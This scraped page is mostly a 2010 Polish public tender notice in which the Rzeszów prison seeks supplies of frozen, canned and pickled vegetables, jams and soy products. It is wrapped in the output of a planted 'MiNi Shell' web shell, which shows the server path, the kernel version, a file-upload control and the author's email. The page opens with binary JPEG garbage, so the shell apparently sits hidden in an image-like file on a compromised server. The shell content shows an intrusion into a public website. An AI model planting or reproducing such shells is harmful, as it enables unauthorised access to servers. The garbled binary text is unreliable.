JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100302/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100302/56736-N-2010.html

<p class="kh_header"><b>Rzeszów: Dostawy artykułów spożywczych (warzywa mrożone, warzywa  konserwowe, warzywa kiszone, dżemy, produkty sojowe)</b><br>
<b>Numer ogłoszenia: 56736 - 2010; data zamieszczenia: 02.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rzeszowie , ul. Załęska 76, 35-322 Rzeszów, woj. podkarpackie, tel. 017 8580700, faks 0-17 8535420.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych (warzywa mrożone, warzywa  konserwowe, warzywa kiszone, dżemy, produkty sojowe).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów spożywczych (warzywa mrożone, warzywa  konserwowe, warzywa kiszone, dżemy, produkty sojowe).

Przedmiotem zamówienia są dostawy artykułów spożywczych do magazynu Zamawiającego w asortymencie i ilościach określonych w  załączniku nr 1,2,3,4,5 
i 6 do SIWZ (warzywa mrożone, warzywa  konserwowe, warzywa kiszone, dżemy, produkty sojowe).
Określone w ogłoszeniu i SIWZ ilości są wielkościami szacunkowymi.
Szczegółowe zapisy związane ze sposobem realizacji zamówienia, warunkami umowy
zawiera załącznik nr 14 ( projekt umowy ) do SIWZ.

TABELA Z ZAŁĄCZNIKA NR 1 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość, 

1.	Groszek zielony mrożony,	15331170-9,	kg	580;
2.	Kalafior mrożony,	15331170-9,	kg	710;
3.	Paprykarz mrożony,	15331170-9,	kg	250;
4.	Mieszanka chińska mrożona,	15331170-9,	kg	220;
5.	Sałatka meksykańska mrożona,	15331170-9,	kg	223;
6.	Fasolka szparagowa mrożona,	15331170-9,	kg	580;
                                                  

TABELA Z ZAŁĄCZNIKA NR 2 DO SIWZ
Lp.	Asortyment, KOD CPV,	Jednostka miary,	Ilość,  

1.	Leczo pieczarkowe w puszce - op. do 4 kg,15331135-2,	kg 1 748;
2.	Koncentrat pomidorowy 30% - op. do 5 kg, 15331425-2, kg 2 471;
3.	Sałatka szwedzka - op. do 5 kg, 15331400-1,	kg  2 058;

TABELA Z ZAŁĄCZNIKA NR 3 DO SIWZ
Lp.	Asortyment, KOD CPV, Jednostka miary, Ilość, 

1.	Kukurydza konserwowa  - op. do 2 kg,	15331460-9,	kg	1 290;
2.	Chrzan tarty - op. do 2 kg,	15331500-2,	kg	 1 037;
3.	Syrop wieloowocowy (sok),	 15321000-4,	kg	900;

TABELA Z ZAŁĄCZNIKA NR 4 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Ogórek kiszony ( w beczkach ),	15331000-7,	kg	4 410;
2.	Kapusta kiszona ( w beczkach ),	15331142-4,	kg	9 480;

TABELA Z ZAŁĄCZNIKA NR 5 DO SIWZ
Lp. Asortyment, 	KOD CPV,	 Jednostka miary,	Ilość, 

1.Marmolada wieloowocowa - op. do 15 kg, 15332230-5,	kg	2 974;
2.Dżem wieloowocowy - op. do 15 kg,	15332290-3,	kg	2 832;
3.Dżem truskawkowy - op. do 15 kg,	15332296-5,	kg	1 860;
4.Powidła śliwkowe  - op. do 15 kg,	15332200-6,	kg	2 258;

TABELA Z ZAŁĄCZNIKA NR 6 DO SIWZ   
Lp.	Asortyment,  KOD CPV,  Jednostka miary, Ilość,  

1.	Kostka sojowa,	15800000-6,	kg	450;
2.	Granulat sojowy,	15800000-6,	kg	405;
3.	Kotlety sojowe,	15800000-6,	kg	540;
  
Określona  w tabelach  ilość towaru  jest  wielkością szacunkową. Zamawiający informuje, że rzeczywista ilość pobranych artykułów może odbiegać od ilości planowanej.
Wszystkie dostarczane wyroby zawarte w niniejszym postępowaniu muszą posiadać czytelne  metki zawierające: nazwę dostarczanego wyrobu, nazwą producenta, masę towaru, datę przydatności do spożycia. 

Zamówiony towar musi spełniać wymogi norm sanitarnych,technologicznych i jakościowych  oraz spełniać warunki wynikające z ustawy z dnia 25 sierpnia  2006r. o bezpieczeństwie 	żywności i żywienia (Dz. U. z  2006r. Nr 171, poz. 1225 z późn. zm.).
 
Dopuszcza się możliwość składania ofert częściowych. 

Zamówienie składa się z sześciu części stanowiących załącznik nr 1,2,3,4,5 i 6 (formularz cenowy) do SIWZ. Zamawiający dopuszcza możliwość złożenia sześciu  załączników przez jednego Wykonawcę z zastrzeżeniem że, Wykonawca może złożyć tylko jedną ofertę na daną część zamówienia. Złożenie większej liczby ofert na część zamówienia spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9, 15.33.11.35-2, 15.33.14.25-2, 15.33.14.00-1, 15.33.14.60-9, 15.33.15.00-2, 15.32.10.00-4, 15.33.10.00-7, 15.33.11.42-4, 15.33.22.30-5, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.00-6, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:
a) aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru (wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp. 
- składa dokument lub dokumenty wystawione w kraju w którym ma siedzibę lub  miejsce zamieszkania potwierdzające, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument powinien być   wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).

Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się określonego powyżej dokumentu, to Wykonawca zastępuje go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca  ma siedzibę lub miejsce zamieszkania.

2. W przypadku, gdy Wykonawca jest rolnikiem indywidualnym na podstawie art. 6 ustawy z dnia 11 kwietnia 2003r.  o kształtowaniu ustroju rolnego (Dz. U.  z 2003r. Nr 64, poz. 592 z późn. zm.) załącza do oferty aktualne oświadczenie,  o którym mowa w art. 7 ustawy z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego: Dowodem potwierdzającym osobiste prowadzenie gospodarstwa rolnego jest oświadczenie prowadzącego to gospodarstwo, poświadczone przez wójta (burmistrza, prezydenta miasta), oświadczenie  o którym mowa w art. 7 ust. 1 ustawy z dnia 11 kwietnia 2003r. o kształtowaniu ustroju rolnego, musi być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, mają się w nim znajdować dane dotyczące osoby prowadzącej gospodarstwo rolne, tj.:
- imię i nazwisko,
- adres zamieszkania
- powierzchnia gospodarstwa rolnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W paragrafie 3 ust. 2 projektu umowy stanowiącego załącznik do SIWZ w niniejszym postępowaniu zapisano:
Ceny określone w niniejszej umowie nie ulegną zmianie przez okres 30 dni od dnia obowiązywania umowy. 
Po wyżej wymienionym okresie Kupujący dopuszcza możliwość uzasadnionych zmian cen artykułów spożywczych pod warunkiem wzrostu lub obniżki (o co najmniej 1%)  cen towarów i usług konsumpcyjnych dotyczących żywności (grupa: Żywność i napoje bezalkoholowe). Zmiana cen może następować nie częściej niż raz na miesiąc proporcjonalnie do wskaźnika zmian cen, po ogłoszeniu przez Prezesa Głównego Urzędu Statystycznego wskaźnika cen towarów i usług konsumpcyjnych. Wiążący dla stron umowy będzie publikowany Wskaźnik cen towarów i usług konsumpcyjnych (miesiąc do poprzedniego miesiąca)proporcjonalnie do którego będzie liczona zwyżka lub obniżka cen.
Zmiana cen nastąpi w terminie do 10 dni od opublikowania przedmiotowego wskaźnika.
a)  o planowanym wzroście  cen  Sprzedający  ma obowiązek zawiadomić  Kupującego na piśmie do 5 dni przed terminem obowiązywania nowych cen wraz z podaniem podstawy zmian oraz nowych cen na poszczególny asortyment towaru, 
b) o planowanej obniżce  cen Kupujący powiadomi Sprzedającego  na piśmie do 5 dni przed terminem obowiązywania nowych cen wraz z podaniem podstawy zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rzeszowie, 35-322 Rzeszów, ul. Załęska 76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2010 godzina 11:00, miejsce: Oferty należy składać w sekretariacie Zakładu Karnego w Rzeszowie, 
35 - 322 Rzeszów, ul. Załęska 76.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy warzyw mrożonych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 1 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość ,

1.	Groszek zielony mrożony,	15331170-9,	kg	580;
2.	Kalafior mrożony,	15331170-9,	kg	710;
3.	Paprykarz mrożony,	15331170-9,	kg	250;
4.	Mieszanka chińska mrożona,	15331170-9,	kg	220;
5.	Sałatka meksykańska mrożona,	15331170-9,	kg	223;
6.	Fasolka szparagowa mrożona,	15331170-9,	kg	580;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy warzyw konserwowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 2 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość , 

1.	Leczo pieczarkowe w puszce - op. do 4 kg,	15331135-2, kg	1 748;
2.	Koncentrat pomidorowy 30% - op. do 5 kg,     15331425-2, kg	2 471;
3.	Sałatka szwedzka - op. do 5 kg,	15331400-1,	kg	2 058;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.35-2, 15.33.14.25-2, 15.33.14.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy warzyw konserwowanych i soku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 3 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Kukurydza konserwowa  - op. do 2 kg,	15331460-9,	kg	1 290;
2.	Chrzan tarty - op. do 2 kg,	15331500-2,	kg	 1 037;
3.	Syrop wieloowocowy (sok),	 15321000-4,	kg	900;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.14.60-9, 15.33.15.00-2, 15.32.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy warzyw kiszonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 4 DO SIWZ
Lp.	Asortyment, 	KOD CPV,	Jednostka miary,	Ilość , 

1.	Ogórek kiszony ( w beczkach ),	15331000-7,	kg	4 410;
2.	Kapusta kiszona ( w beczkach );	15331142-4;	kg	9 480;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.10.00-7, 15.33.11.42-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy dżemu, marmolady i powidła..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 5 DO SIWZ
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość, 

1.	Marmolada wieloowocowa - op. do 15 kg,	15332230-5, kg	2 974;
2.	Dżem wieloowocowy - op. do 15 kg,	15332290-3, kg	2 832;
3.	Dżem truskawkowy - op. do 15 kg,	15332296-5,	kg	1 860;
4.	Powidła śliwkowe - op. do 15 kg,	15332200-6,	kg	2 258;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.22.30-5, 15.33.22.90-3, 15.33.22.96-5, 15.33.22.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy produktów sojowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 6 DO SIWZ   
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Kostka sojowa,	15800000-6,	kg	450;
2.	Granulat sojowy,	15800000-6,	kg	405;
3.	Kotlety sojowe,	15800000-6,	kg	540;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com